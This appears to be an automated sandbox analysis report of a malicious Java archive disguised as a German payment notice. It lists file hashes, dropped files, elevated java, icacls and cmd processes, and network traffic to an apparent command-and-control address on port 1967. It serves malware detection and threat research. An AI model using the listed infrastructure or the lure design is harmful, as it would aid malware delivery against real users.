Category: | dropped |
Size (bytes): | 2681931 |
Entropy (8bit): | 5.90068240083877 |
Encrypted: | false |
SSDEEP: | 24576:DyciOooDbK7Yw1J75n4BP/NtK2ov3mhDR6:3iOLDOZJ75nwtK2ovWh8 |
MD5: | 2F4A99C2758E72EE2B59A73586A2322F |
SHA1: | AF38E7C4D0FC73C23ECD785443705BFDEE5B90BF |
SHA-256: | 24D81621F82AC29FCDD9A74116031F5907A2343158E616F4573BBFA2434AE0D5 |
SHA-512: | B860459A0D3BF7CCB600A03AA1D2AC0358619EE89B2B96ED723541E182B6FDAB53AEFEF7992ACB4E03FCA67AA47CBE3907B1E6060A60B57ED96C4E00C35C7494 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 238200 |
Entropy (8bit): | 6.633830240784974 |
Encrypted: | false |
SSDEEP: | 6144:2ypwv+96lffpB7TrNvEMAR8sKq9dMJE6K0p+aA5J3VUfXw:XlU5RBvrNMM8RbD7T6w |
MD5: | 75A586728AA168951B1C48F28F34C553 |
SHA1: | 4E150E7CBFFA43FB120876221343AF15B3332049 |
SHA-256: | 9C2A20B67EDE0CC57EB3E3708EAD52D98AD6065D5A539319D771846ACFAC6A75 |
SHA-512: | 586AFF19E18C0B30C9E3AA859C3DC028C2472625E98EF7C46E023118CE518CEA149F4A8FE45DC3D43ABA2E2E8A9FAEB9EF34C25FA5B745E5FA294BBCDDE04851 |
Malicious: | false |
Yara Hits: | |
Antivirus: | |
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4322173 |
Entropy (8bit): | 7.994785882289737 |
Encrypted: | true |
SSDEEP: | 98304:czJoX0izQbrabWo2MxgErRYxFOY8IsFWyTIiTIzMpca:cJoXHQKW9MxRr8wZZsikzMaa |
MD5: | B33387E15AB150A7BF560ABDC73C3BEC |
SHA1: | 66B8075784131F578EF893FD7674273F709B9A4C |
SHA-256: | 2EAE3DEA1C3DDE6104C49F9601074B6038FF6ABCF3BE23F4B56F6720A4F6A491 |
SHA-512: | 25CFB0D6CE35D0BCB18527D3AA12C63ECB2D9C1B8B78805D1306E516C13480B79BB0D74730AA93BD1752F9AC2DA9FDD51781C48844CEA2FD52A06C62852C8279 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 791222 |
Entropy (8bit): | 7.998588520286719 |
Encrypted: | true |
SSDEEP: | 24576:IhCFW8WXvOsWW9XGmvcVfkfTnzrLvadKPpv:IhCYWstW202t |
MD5: | E1AA38A1E78A76A6DE73EFAE136CDB3A |
SHA1: | C463DA71871F780B2E2E5DBA115D43953B537DAF |
SHA-256: | 2DDDA8AF6FAEF8BDE46ACF43EC546603180BCF8DCB2E5591FFF8AC9CD30B5609 |
SHA-512: | FEE16FE9364926EC337E52F551FD62ED81984808A847DE2FD68FF29B6C5DA0DCC04EF6D8977F0FE675662A7D2EA1065CDCDD2A5259446226A7C7C5516BD7D60D |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1252711 |
Entropy (8bit): | 5.880198419513214 |
Encrypted: | false |
SSDEEP: | 24576:qcLcrkG6ME7PPFK/1cVfVEy3NspE5cS3Zs406kPPJ:qcLcrkG6ME7PPQ/iVfVEy36C5cKZsJbp |
MD5: | D87EC90703E5CA1D19D16A2B571A01D4 |
SHA1: | 0DACADEFD3E7F241C0E400851F8AD03E2FCFAABC |
SHA-256: | 76D1134A18619447F6D6DBB680922EE9BF5C7283365843E8F253DB33AA69B6EF |
SHA-512: | DDA92887A99EA20A145CCEEA3911F3FDD3CCEC1A079CFFD20234C7C5CC61DB3EB9C6FF0000F3EE6317A0071EF6683D6CD5101563843DEBA7B77AB2F680FDB8D1 |
Malicious: | false |
Antivirus: | |
Preview: |
Process: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1252711 |
Entropy (8bit): | 5.880198419513214 |
Encrypted: | false |
SSDEEP: | 24576:qcLcrkG6ME7PPFK/1cVfVEy3NspE5cS3Zs406kPPJ:qcLcrkG6ME7PPQ/iVfVEy36C5cKZsJbp |
MD5: | D87EC90703E5CA1D19D16A2B571A01D4 |
SHA1: | 0DACADEFD3E7F241C0E400851F8AD03E2FCFAABC |
SHA-256: | 76D1134A18619447F6D6DBB680922EE9BF5C7283365843E8F253DB33AA69B6EF |
SHA-512: | DDA92887A99EA20A145CCEEA3911F3FDD3CCEC1A079CFFD20234C7C5CC61DB3EB9C6FF0000F3EE6317A0071EF6683D6CD5101563843DEBA7B77AB2F680FDB8D1 |
Malicious: | false |
Antivirus: | |
Preview: |
Process: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12898 |
Entropy (8bit): | 7.93277955179482 |
Encrypted: | false |
SSDEEP: | 192:nUGq7vOGgKh7TXP3lab0C2ahLOiXFeB1WUt32SqcS2whWuGxMQY3oe66foVRVGHT:pqaoHXP3lm0FqjXFQ19Q/h6LdVRsDv |
MD5: | 5B6CEE019A5BCD56303094BB15787AAC |
SHA1: | DFE538F5DCD7910B86F50EADD502810D2A6BDDAB |
SHA-256: | A2AF2C47293272C35DDF0A3187F190E1235E7413CF076C8A8B651EE9162DFEBD |
SHA-512: | E729A6BB2A19FD4E18CF6AC4C5444452552594072EFB943283EA1F75A095D8F3304C466697A712D7DE9A7C8AFA387C2C07CB2824D4F0BA1FBA96FC003253C00E |
Malicious: | true |
Yara Hits: | |
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 45 |
Entropy (8bit): | 0.9111711733157262 |
Encrypted: | false |
SSDEEP: | 3:/lwlt7n:WNn |
MD5: | C8366AE350E7019AEFC9D1E6E6A498C6 |
SHA1: | 5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61 |
SHA-256: | 11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238 |
SHA-512: | 33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\7za.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8870 |
Entropy (8bit): | 6.015040608113816 |
Encrypted: | false |
SSDEEP: | 96:3MbgmlLF2cpcJ2TYe3YWx4BX/euTlAWhA3wD6shIvgZ9Li1Q8ojJn7:3sgmNYciYZxxWTlAMzhIv4h3Rp7 |
MD5: | 01FEA3AC89581EAAF285D15AA0208E7C |
SHA1: | DA711D18D81D63D7DE15037B0E480E1A9EA745A9 |
SHA-256: | 838ED717B79448059E07EA419727C7235A543BBBECA5C116F36ADE6234E59DB0 |
SHA-512: | B7BA0F5BDB9F84DCD61B79B0B949FB6663969A356E6718C06FBA1CADB20C9FDA3B22AEEF95D1AFF56ECD7FE227299B2E3D0D11A9A6915D17CA9C0E506C0F7D66 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\7za.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8618 |
Entropy (8bit): | 6.0088017909748235 |
Encrypted: | false |
SSDEEP: | 192:DAvI31xZ2jYlZzRxz0hdsRgi1+mOZPzT3ID61CzA:J2kLRxz0hORgirm3o60U |
MD5: | A4E70FF4D1899402F51C29743B3C85F2 |
SHA1: | CA6F6FCD695385C684250C43F9AA648C5504288F |
SHA-256: | 462EC1868551085AFB72BB4713FC5DA73EB5427154D4E59E2EA041AF80393BA3 |
SHA-512: | E763D90639559543330E89A4A3B9574DA28D6810C2572E4F9B898DCF3998ACA78710A36E82F6060E1B450FC6E911F21F21A3D2698A570AF784FFD40C6B9378C1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\7za.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 765 |
Entropy (8bit): | 5.1548602300807405 |
Encrypted: | false |
SSDEEP: | 12:Uv+RfxMoSC8s0P6e+/g+iudd0ulPso7kqNUUofSjOf8E7oNV/NhkZEgU/zh1itlV:2+ZqoZ90P6J/gId+ulj71U7BD76VvnLs |
MD5: | 3567EECA2D2544FF819D55313C65C039 |
SHA1: | A73B81C80B2E5DC4138B0E88A3F46EBEDDBB465F |
SHA-256: | 2DFD9FC15E4F55CD1349118CED981AAF181EA8ACE63FC460F5A7ED3F5E8CBA13 |
SHA-512: | CDC211B1CE190B25BCD40204DF9B557F32D3C347FBCCFE38624804FF9D46D7D1979A5CD8AA9D22C0C632EFD0ACEE24FDEBFF8DCD6BECF7DA3AE49CF3457BD6A7 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\7za.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1639 |
Entropy (8bit): | 5.454765167988992 |
Encrypted: | false |
SSDEEP: | 48:KAXQ38VTN20Prvlea1sIl+sx2vp/lo4nyn:S+ZYAlsh/lwn |
MD5: | 39D4A1BF0606FB64F1BED662E6448293 |
SHA1: | 686AA7CE9BFD0167DB661D45206740428EB5B118 |
SHA-256: | 81A44B356D369D87D26D16988793EF41C8C1C34B3914C3B7EADA96BB075F1113 |
SHA-512: | D875093EC1995D195B72352E8509C085FC54B7D46FAB7A8FD662D07C08917BF5C98AB54AF005F1D456CA039341D45D236F47B13301F3A4E14654A80A442F4EF0 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\7za.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 91 |
Entropy (8bit): | 4.946111849666226 |
Encrypted: | false |
SSDEEP: | 3:ZLCAWIzBExR8UpLVc3sRgmMgX84oxXbEDCta:1KItMFpL6sRwuoxXbXa |
MD5: | 3FB263055B3F7EED14DE15F2C21958B2 |
SHA1: | 2D341C2A4AE64A8503F359479E38E093B4605046 |
SHA-256: | 01A11E2B9BB27F0586017ECFBA7E40D71150F61830317AA0395D7A60704C8B7D |
SHA-512: | 0033B60BAD32ED6545E17477F815B8046CEB2E3D82BBB27780F6A60F0429DF1054CFBCF814B59DDBECCC8102B5F326D766028E54E41B35E048B825294B6E1BBE |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\PING.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 392 |
Entropy (8bit): | 4.728014748542534 |
Encrypted: | false |
SSDEEP: | 12:P95pTcgTcgTcgTcgTcgTLs4oR7n+AFSkIrxMVlmJHaVzvv:PNURD+AokItULVDv |
MD5: | 1A20F9D48A90568E8726C71FE7C9D490 |
SHA1: | 3DBCB62DCFA0588D85A7A1ED71D5EED10AF82E2E |
SHA-256: | 79C8CE0C4209CCEB04EC136DEF7AA546936D288D680A15F4469352CE865A54C0 |
SHA-512: | B362A048BDCC201530C8132CEB05526BB891AF3B7CC4819AA9ABDAFEF096F598064F01BC91C24AF0348AB753F238BD698FAAC644D623E19C05BE6A66E7801794 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.93277955179482 |
TrID: | |
File name: | Avisierung vom 03.04.2025 Kundennummer 1084472.jar |
File size: | 12'898 bytes |
MD5: | 5b6cee019a5bcd56303094bb15787aac |
SHA1: | dfe538f5dcd7910b86f50eadd502810d2a6bddab |
SHA256: | a2af2c47293272c35ddf0a3187f190e1235e7413cf076c8a8b651ee9162dfebd |
SHA512: | e729a6bb2a19fd4e18cf6ac4c5444452552594072efb943283ea1f75a095d8f3304c466697a712d7de9a7c8afa387c2c07cb2824d4f0ba1fba96fc003253c00e |
SSDEEP: | 192:nUGq7vOGgKh7TXP3lab0C2ahLOiXFeB1WUt32SqcS2whWuGxMQY3oe66foVRVGHT:pqaoHXP3lm0FqjXFQ19Q/h6LdVRsDv |
TLSH: | 4842BF812B60471AFA53213B43C48407FE5D059AA50C62A773C7B9A53A30D85AFE77EF |
File Content Preview: | PK...........Z................META-INF/......PK..............PK...........Z................META-INF/MANIFEST.MF.M..LK-...K-*....R0.3..r.JM,IM.u...X....[.*h..%&..*8.....%...k.r.&f..:.$..[)8G.x{....r.r..PK.....rZ...[...PK...........Z................G.class. |
Icon Hash: | d08c8e8ea2868a54 |
- Total Packets: 41
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 4, 2025 07:00:13.334759951 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:13.511122942 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:13.511214018 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:18.908715963 CEST | 49717 | 80 | 192.168.2.4 | 208.95.112.1 |
Apr 4, 2025 07:00:19.010140896 CEST | 80 | 49717 | 208.95.112.1 | 192.168.2.4 |
Apr 4, 2025 07:00:19.010325909 CEST | 49717 | 80 | 192.168.2.4 | 208.95.112.1 |
Apr 4, 2025 07:00:19.010659933 CEST | 49717 | 80 | 192.168.2.4 | 208.95.112.1 |
Apr 4, 2025 07:00:19.115631104 CEST | 80 | 49717 | 208.95.112.1 | 192.168.2.4 |
Apr 4, 2025 07:00:19.115827084 CEST | 49717 | 80 | 192.168.2.4 | 208.95.112.1 |
Apr 4, 2025 07:00:19.117383957 CEST | 49717 | 80 | 192.168.2.4 | 208.95.112.1 |
Apr 4, 2025 07:00:19.217335939 CEST | 80 | 49717 | 208.95.112.1 | 192.168.2.4 |
Apr 4, 2025 07:00:20.777646065 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:21.007424116 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:21.007494926 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:21.223809004 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:22.386948109 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:22.386986971 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:22.387013912 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:22.387032986 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:22.387115002 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:22.387115955 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:22.763606071 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:22.992410898 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:22.992486954 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.056888103 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057171106 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057212114 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057239056 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057318926 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057401896 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057451963 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057662010 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057702065 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057713985 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057742119 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057756901 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057781935 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057797909 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057821035 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057827950 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057859898 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057873964 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057900906 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057914972 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057940006 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057949066 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.057977915 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.057997942 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.058022022 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.210450888 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.236756086 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.236798048 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.236870050 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.237049103 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237147093 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237184048 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237205029 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.237221956 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237261057 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237273932 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.237363100 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237420082 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.237638950 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237678051 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237734079 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.237740040 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237778902 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.237826109 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.238121033 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238188028 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238226891 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238234997 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.238332987 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238392115 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.238399029 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238440037 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238482952 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.238563061 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238603115 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238646984 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.238704920 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238743067 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238779068 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238786936 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.238816023 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.238862991 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.413752079 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.413836956 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.413873911 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.413913965 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.413923025 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.413950920 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.413992882 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.414124012 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.414160967 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.414181948 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.414207935 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.414244890 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Apr 4, 2025 07:00:23.414258003 CEST | 49716 | 1967 | 192.168.2.4 | 128.90.145.126 |
Apr 4, 2025 07:00:23.414350033 CEST | 1967 | 49716 | 128.90.145.126 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Apr 4, 2025 07:00:08.643171072 CEST | 192.168.2.4 | 1.1.1.1 | 0x29d0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 4, 2025 07:00:09.651026964 CEST | 192.168.2.4 | 1.1.1.1 | 0x29d0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 4, 2025 07:00:10.663887024 CEST | 192.168.2.4 | 1.1.1.1 | 0x29d0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 4, 2025 07:00:12.679073095 CEST | 192.168.2.4 | 1.1.1.1 | 0x29d0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 4, 2025 07:00:18.801630974 CEST | 192.168.2.4 | 1.1.1.1 | 0xc924 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Apr 4, 2025 07:00:13.265022993 CEST | 1.1.1.1 | 192.168.2.4 | 0x29d0 | No error (0) | 128.90.145.126 | A (IP address) | IN (0x0001) | false | ||
Apr 4, 2025 07:00:13.265078068 CEST | 1.1.1.1 | 192.168.2.4 | 0x29d0 | No error (0) | 128.90.145.126 | A (IP address) | IN (0x0001) | false | ||
Apr 4, 2025 07:00:13.265160084 CEST | 1.1.1.1 | 192.168.2.4 | 0x29d0 | No error (0) | 128.90.145.126 | A (IP address) | IN (0x0001) | false | ||
Apr 4, 2025 07:00:13.265196085 CEST | 1.1.1.1 | 192.168.2.4 | 0x29d0 | No error (0) | 128.90.145.126 | A (IP address) | IN (0x0001) | false | ||
Apr 4, 2025 07:00:18.900382042 CEST | 1.1.1.1 | 192.168.2.4 | 0xc924 | No error (0) | 208.95.112.1 | A (IP address) | IN (0x0001) | false |
Target ID: | 1 |
Start time: | 01:00:07 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\7za.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xac0000 |
File size: | 289'792 bytes |
MD5 hash: | 77E556CDFDC5C592F5C46DB4127C6F4C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 01:00:07 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 01:00:07 |
Start date: | 04/04/2025 |
Path: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xcc0000 |
File size: | 257'664 bytes |
MD5 hash: | 9DAA53BAB2ECB33DC0D9CA51552701FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | high |
Has exited: | false |
Target ID: | 4 |
Start time: | 01:00:07 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 5 |
Start time: | 01:00:08 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\icacls.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x2f0000 |
File size: | 29'696 bytes |
MD5 hash: | 2E49585E4E08565F52090B144062F97E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 01:00:08 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 12 |
Start time: | 01:00:22 |
Start date: | 04/04/2025 |
Path: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 257'664 bytes |
MD5 hash: | 9DAA53BAB2ECB33DC0D9CA51552701FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | high |
Has exited: | true |
Target ID: | 13 |
Start time: | 01:00:22 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 15 |
Start time: | 01:00:23 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xc70000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 16 |
Start time: | 01:00:23 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 17 |
